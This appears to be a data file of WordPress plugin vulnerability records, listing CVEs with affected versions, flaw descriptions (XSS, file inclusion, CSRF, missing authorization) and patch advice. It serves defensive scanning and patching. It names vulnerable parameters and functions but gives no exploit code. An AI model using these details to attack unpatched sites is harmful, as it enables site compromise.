{"CVE_ID":"CVE-2025-1802","slug":"ht-mega-for-elementor","versionImpact":"2.8.3","versionEndExcluding":"2.8.4","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018marker_title\u2019, 'notification_content', and 'stt_button_text' parameters in all versions up to, and including, 2.8.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability was partially patched in version 2.8.3.","recommendation":"Update to version 2.8.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/extensions\\\/scroll-to-top\\\/assets\\\/js\\\/htmega-scroll-to-top.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/extensions\\\/scroll-to-top\\\/assets\\\/js\\\/htmega-scroll-to-top.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/htmega_googlemap.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/htmega_googlemap.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/htmega_notify.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/htmega_notify.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249106\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249106\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257530\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257530\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68530904-22d2-4228-b9f2-76f5ee1fd541?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68530904-22d2-4228-b9f2-76f5ee1fd541?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-54384","slug":"falcon","versionImpact":"2.8.3","versionEndExcluding":"2.8.4","description":"Missing Authorization vulnerability in eLightUp Falcon \u2013 WordPress Optimizations & Tweaks allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Falcon \u2013 WordPress Optimizations & Tweaks: from n\/a through 2.8.3.","recommendation":"Update to version 2.8.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/falcon\\\/vulnerability\\\/wordpress-falcon-wordpress-optimizations-tweaks-plugin-2-8-3-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/falcon\\\/vulnerability\\\/wordpress-falcon-wordpress-optimizations-tweaks-plugin-2-8-3-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6164","slug":"ymc-smart-filter","versionImpact":"2.8.32","versionEndExcluding":"2.8.33","description":"The Filter & Grids WordPress plugin before 2.8.33 is vulnerable to Local File Inclusion via the post_layout parameter. This makes it possible for an unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.","recommendation":"Update to version 2.8.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/40bd880e-67a1-4180-b197-8dcadaa0ace4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/40bd880e-67a1-4180-b197-8dcadaa0ace4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9049","slug":"beaver-builder-lite-version","versionImpact":"2.8.3.6","versionEndExcluding":"2.8.3.7","description":"The Beaver Builder \u2013 WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Button Group module in all versions up to, and including, 2.8.3.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13517c2f-43ce-4e9a-81c4-d422b0e7273a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13517c2f-43ce-4e9a-81c4-d422b0e7273a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157026\\\/beaver-builder-lite-version\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157026\\\/beaver-builder-lite-version\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10871","slug":"category-ajax-filter","versionImpact":"2.8.2","versionEndExcluding":"2.8.3","description":"The Category Ajax Filter plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.8.2 via the 'params[caf-post-layout]' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where files with a .php extension can be uploaded and included.","recommendation":"Update to version 2.8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cb03d81-ac33-487b-bf4d-927e8104866e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cb03d81-ac33-487b-bf4d-927e8104866e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/category-ajax-filter\\\/tags\\\/2.8.2\\\/includes\\\/functions.php#L180\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/category-ajax-filter\\\/tags\\\/2.8.2\\\/includes\\\/functions.php#L180\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183800\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183800\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1261","slug":"ht-mega-for-elementor","versionImpact":"2.8.2","versionEndExcluding":"2.8.3","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to DOM-Based Stored Cross-Site Scripting via the plugin's Countdown widget in all versions up to, and including, 2.8.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: This vulnerability exists due to an incomplete fix for CVE-2024-3307.","recommendation":"Update to version 2.8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249106\\\/ht-mega-for-elementor\\\/tags\\\/2.8.3\\\/assets\\\/js\\\/htmega-widgets-active.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249106\\\/ht-mega-for-elementor\\\/tags\\\/2.8.3\\\/assets\\\/js\\\/htmega-widgets-active.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e553135d-88e0-4840-99ad-9514c2243b7d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e553135d-88e0-4840-99ad-9514c2243b7d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4415","slug":"sunshine-photo-cart ","versionEndExcluding":"2.8.29","description":"The Sunshine Photo Cart plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.8.28 This is due to missing or incorrect nonce validation on the sunshine_products_quicksave_post() function. This makes it possible for unauthenticated attackers to save custom post data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c043510b-6aeb-4e91-80f0-a62970c01b1d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c043510b-6aeb-4e91-80f0-a62970c01b1d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2548557\\\/sunshine-photo-cart\\\/tags\\\/2.8.29\\\/admin\\\/sunshine-products.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2548557\\\/sunshine-photo-cart\\\/tags\\\/2.8.29\\\/admin\\\/sunshine-products.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7622","slug":"revision-manager-tmc","versionImpact":"2.8.19","versionEndExcluding":"2.8.20","description":"The Revision Manager TMC plugin for WordPress is vulnerable to unauthorized arbitrary email sending due to a missing capability check on the _a_ajaxQuickEmailTestCallback() function in all versions up to, and including, 2.8.19. This makes it possible for authenticated attackers, with subscriber-level access and above, to send emails with arbitrary content to any individual through the vulnerable web server.","recommendation":"Update to version 2.8.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c8a6ff9-6aa8-4e0f-b058-759561a55508?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c8a6ff9-6aa8-4e0f-b058-759561a55508?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/revision-manager-tmc\\\/trunk\\\/src\\\/Components\\\/Notifications.php#L357\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/revision-manager-tmc\\\/trunk\\\/src\\\/Components\\\/Notifications.php#L357\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147298\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147298\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10692","slug":"powerpack-lite-for-elementor","versionImpact":"2.8.1","versionEndExcluding":"2.8.2","description":"The PowerPack Elementor Addons (Free Widgets, Extensions and Templates) plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.8.1 via the Content Reveal widget due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to.","recommendation":"Update to version 2.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203205\\\/powerpack-lite-for-elementor\\\/tags\\\/2.8.2\\\/modules\\\/content-reveal\\\/widgets\\\/content-reveal.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203205\\\/powerpack-lite-for-elementor\\\/tags\\\/2.8.2\\\/modules\\\/content-reveal\\\/widgets\\\/content-reveal.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d073d9df-0636-4884-b5d0-e2da779e5edf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d073d9df-0636-4884-b5d0-e2da779e5edf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12365","slug":"w3-total-cache","versionImpact":"2.8.1","versionEndExcluding":"2.8.2","description":"The W3 Total Cache plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the is_w3tc_admin_page function in all versions up to, and including, 2.8.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to obtain the plugin's nonce value and perform unauthorized actions, resulting in information disclosure, service plan limits consumption as well as making web requests to arbitrary locations originating from the web application that can be used to query information from internal services, including instance metadata on cloud-based applications.","recommendation":"Update to version 2.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Extension_ImageService_Plugin_Admin.php#L200\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Extension_ImageService_Plugin_Admin.php#L200\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Extensions_Plugin_Admin.php#L246\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Extensions_Plugin_Admin.php#L246\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Extensions_Plugin_Admin.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Extensions_Plugin_Admin.php#L55\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Generic_Plugin_Admin.php#L385\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Generic_Plugin_Admin.php#L385\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Generic_Plugin_Admin.php#L516\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Generic_Plugin_Admin.php#L516\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Generic_Plugin_Admin.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Generic_Plugin_Admin.php#L55\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/inc\\\/options\\\/common\\\/footer.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/inc\\\/options\\\/common\\\/footer.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/inc\\\/options\\\/common\\\/top_nav_bar.php#L217\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/inc\\\/options\\\/common\\\/top_nav_bar.php#L217\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Root_Loader.php#L269\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Root_Loader.php#L269\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/UsageStatistics_Plugin_Admin.php#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/UsageStatistics_Plugin_Admin.php#L10\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/UsageStatistics_Plugin_Admin.php#L94\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/UsageStatistics_Plugin_Admin.php#L94\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Util_Admin.php#L822\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Util_Admin.php#L822\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/w3-total-cache.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/w3-total-cache.php#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/196e629f-7c77-4bcb-8224-305a0108b630?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/196e629f-7c77-4bcb-8224-305a0108b630?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12008","slug":"w3-total-cache","versionImpact":"2.8.1","versionEndExcluding":"2.8.2","description":"The W3 Total Cache plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.8.1 through the publicly exposed debug log file. This makes it possible for unauthenticated attackers to view potentially sensitive information in the exposed log file. For example, the log file may contain nonce values that can be used in further CSRF attacks.\r\nNote: the debug feature must be enabled for this to be a concern, and it is disabled by default.","recommendation":"Update to version 2.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Util_Debug.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Util_Debug.php#L29\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Util_Environment.php#L430\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Util_Environment.php#L430\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8292f23c-fb17-4082-9788-f643d1bb097e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8292f23c-fb17-4082-9788-f643d1bb097e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12006","slug":"w3-total-cache","versionImpact":"2.8.1","versionEndExcluding":"2.8.2","description":"The W3 Total Cache plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 2.8.1. This makes it possible for unauthenticated attackers to deactivate the plugin as well as activate and deactivate plugin extensions.","recommendation":"Update to version 2.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Extensions_Plugin_Admin.php#L186\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Extensions_Plugin_Admin.php#L186\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Extensions_Plugin_Admin.php#L220\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Extensions_Plugin_Admin.php#L220\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Extensions_Plugin_Admin.php#L60\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Extensions_Plugin_Admin.php#L60\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Extensions_Plugin_Admin.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Extensions_Plugin_Admin.php#L63\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Generic_Plugin_Admin.php#L212\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Generic_Plugin_Admin.php#L212\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/329ad5dc-9339-4540-aba3-f21a78a74d4b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/329ad5dc-9339-4540-aba3-f21a78a74d4b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-2094","slug":"yellow-yard","versionEndExcluding":"2.8.2","description":"The Yellow Yard Searchbar WordPress plugin before 2.8.2 does not escape some URL parameters before outputting them back to the user, leading to Reflected Cross-Site Scripting","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c9a106e1-29ae-47ad-907b-01086af3d3fb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c9a106e1-29ae-47ad-907b-01086af3d3fb\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7067","slug":"woolentor-addons","versionImpact":"2.8.1","versionEndExcluding":"2.8.2","description":"The ShopLentor \u2013 WooCommerce Builder for Elementor & Gutenberg +10 Modules \u2013 All in One Solution (formerly WooLentor) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'woolentor_template_store' function in all versions up to, and including, 2.8.1. This makes it possible for authenticated attackers, with contributor access and above to access the nonce used to access this function and set a blank template as the default template.","recommendation":"Update to version 2.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/860c2339-b2a9-4a4e-a186-07a5fb042b06?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/860c2339-b2a9-4a4e-a186-07a5fb042b06?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3044764\\\/woolentor-addons\\\/trunk?contextall=1&old=3037382&old_path=%2Fwoolentor-addons%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3044764\\\/woolentor-addons\\\/trunk?contextall=1&old=3037382&old_path=%2Fwoolentor-addons%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1166","slug":"ultimate-social-media-icons","versionEndExcluding":"2.8.2","description":"The USM-Premium WordPress plugin before 16.3 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example, in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/825eccf9-f351-4a5b-b238-9969141b94fa\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/825eccf9-f351-4a5b-b238-9969141b94fa\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12599","slug":"ht-mega-for-elementor","versionImpact":"2.8.1","versionEndExcluding":"2.8.2","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Countdown widget in all versions up to, and including, 2.8.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234495\\\/ht-mega-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234495\\\/ht-mega-for-elementor\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20a67cde-612a-4c57-83d6-a5d8f3716a2d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20a67cde-612a-4c57-83d6-a5d8f3716a2d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13349","slug":"stockdio-historical-chart","versionImpact":"2.8.18","versionEndExcluding":"2.8.19","description":"The Stockdio Historical Chart plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'stockdio-historical-chart' shortcode in all versions up to, and including, 2.8.18 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.19, or a newer patched 